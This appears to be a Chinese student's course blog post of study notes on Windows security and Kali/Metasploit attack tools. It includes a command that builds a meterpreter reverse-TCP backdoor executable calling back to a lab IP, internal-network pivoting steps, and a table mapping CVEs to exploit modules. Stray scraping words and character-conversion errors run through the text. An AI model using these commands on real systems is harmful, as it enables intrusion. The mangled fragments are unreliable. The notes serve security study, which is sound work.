1.Windows操做系統分爲運行於處理器特權模式(ring 0)的操做系統內核,以及運行在處理器非特權模式(ring 3)的用戶空間代碼。
採用宏內核(monolithic)模式進行架構。
2.內核基本模塊分爲:Windows執行體 、Windows內核體 、設備驅動程序 、硬件抽象層 、Windows窗口與圖形界面內核實現代碼 、系統支持進程 、 環境子系統服務進程 、服務進程 、用戶應用條件 、核心子系統DLL 。
3.Windows將進程視做可執行程序運行時刻的容器,而線程是指令執行的具體載體。
4.Windows的虛擬內存空間分爲系統核心內存區間與用戶內存區間兩部分。
5.Windows早期使用FAT文件分配表格式來管理文件系統,如今使用NTFS文件系統,較以前更加安全,具備更高的性能、可靠性和資源利用率。Windows可執行文件採用PE格式。
6.Windows系統註冊表在做爲系統全局配置、用戶和應用軟件配置信息的存儲倉庫,在Windows系統配置和控制方面承擔着關鍵角色。可經過自帶的 regedit.exe 註冊表查找編輯工具或其餘第三方工具進行訪問與修改,可以使用 RegMon 等工具進行監控。html
7.Windows安全體系結構:Windows操做系統基於引用監控器模型來實現基本的對象安全模型。其中最爲核心的是位於內核中的SRM安全引用監控器,以及位於用戶臺的LSASS安全服務。
8.Windows身份認證機制:Windows操做系統中以安全主題概念來包含全部進行系統資源訪問請求的實體對象,有用戶,用戶組,和計算機三大類。其中用戶組是爲了簡化用戶管理而引入的用戶帳戶容器。linux
9.Windows遠程口令猜想與破解攻擊,Windows經過基於服務器消息塊SMB協議承載的文件與打印機共享服務來爲網絡用戶提供遠程訪問文件系統和打印機的支持,於是它也就成爲攻擊者實施Windows遠程口令字猜想的傳統攻擊渠道。
10.Windows網絡服務遠程滲透攻擊,主要針對Windows系統默認開放的諸如135(TCP)、137(UDP)等端口進行滲透,針對NetBios網絡服務、SMB網絡服務、MSRPC網絡服務進行攻擊,還有針對微軟網絡服務及第三方網絡服務進行遠程攻擊。
11.Window本地安全攻防技術,利用以前的技術得到Windows系統的訪問權後,接下來的攻擊主要包括本地特權提高、敏感信息竊取、消蹤滅跡、遠程控制與後門程序。ios
1.searchsploit,列舉出漏洞和文件地址,相對目錄是/usr/share/exploitdb/platforms
2.pattern create,測試漏洞
3.jboss-autopwn-linux/win專門針對Jboss的漏洞利用工具
4.ikat,自動化開啓,等待目標訪問中招。
5.termineter評估智能電錶的安全性。shell
1.啓動服務
2.Metasploit-framework在usr/share/metasploit-framework目錄下。auxiliary 輔助模塊、encoders 供msfencode編碼工具使用、exploit 攻擊模塊、payloads 攻擊載荷、post 後滲透階段模塊
3.msfpayload:用來生成payload或者shellcode,搜索的時候可使用msfpayload -l |grep "windows",-o 列出payload所需參數
4.msfconsole開啓metadploit
5.測試示例
windows
meterpreter模塊,Metasploit框架中的一個拓展模塊。經常使用的命令:background 將當前會話放置後臺、load/use 加載模塊、interact 切換進一個信道、migrate 遷移進程、run 執行一個已有的模塊、resource 執行一個已有的rc腳本
(1)生成meterpreter後門api
msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.6.119 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe
(2)開啓handler,打開監聽瀏覽器
set LHOST 172.16.6.91 #本地IP exploit
(3)在目標主機打開door1.exe
(4)返回一個shell
(5)執行常見命令安全
1.查看跳板機的網卡服務器
ifconfig
2.添加路由表網絡
run autoroute -s 10.0.0.1
3.開socks代理
search socks use auxiliary/server/socks4a axploit
4.經過background和sessions -i能夠自由切換進入session
5.輸入run能夠看待在meterpreter上能夠作的不少命令
6.經過run post/能夠看到後滲透測試的模塊
7.查看內網信息
run arp_scanner -r 目標IP地址段
對XSS漏洞的利用,BeeF是瀏覽器攻擊框架的簡稱,專一於瀏覽器端的滲透工具。
使用3000端口
漏洞類型 | 漏洞具體信息 | 攻擊方式 | Metasploit模塊 |
---|---|---|---|
SMB服務MS08-067漏洞 | MS08-067 | 網絡服務滲透攻擊 | ms08_067_netapi |
IE瀏覽器MS11-050 Use after Free漏洞 | MS11-050 | 瀏覽器滲透攻擊 | ms11_050_mshtml_cobjectelement |
IE瀏覽器MS10-018 Use after Free漏洞 | MS10-018 | 瀏覽器滲透攻擊 | ms10_018_ie_behaviors |
KingView ActiveX堆溢出漏洞 | CVE-2011-3142 | 瀏覽器插件滲透攻擊 | kingview_validateuser |
Office Word軟件RTF棧溢出漏洞 | MS10-087 | 應用軟件文件格式滲透攻擊 | ms10_087_rtf_pfragments_bof |
Adobe PDF軟件CoolType表棧溢出漏洞 | CVE-2010-2883 | 應用軟件文件格式滲透攻擊 | adobe_cooltype_sing |
Windows鍵盤驅動程序提權漏洞 | MS10-073 | 本地特權提高攻擊 | ms10_073_kbdlayout |
Windows任務計劃服務提權漏洞 | MS10-092 | 本地特權提高攻擊 | ms10_092_schelevator |
周次 | 教材學習 | 視頻學習 | 博客量 |
---|---|---|---|
第一週 | 實驗樓 | 實驗樓 | 1/1 |
第二週 | 第一,二章 | kali1-5 | 2/2 |
第三週 | 第三章 | kali6-10 | 3/3 |
第四周 | 第四章 | Kali11-15 | 4/4 |
第五週 | 第11,12章 | Kali16-20 | 5/5 |
第六週 | 第五章 | Kali21-25 | 6/6 |
第七週 | 教材第七章的學習完成p272的實踐練習 | 5個Kali視頻學習(26-30) | 7/7 |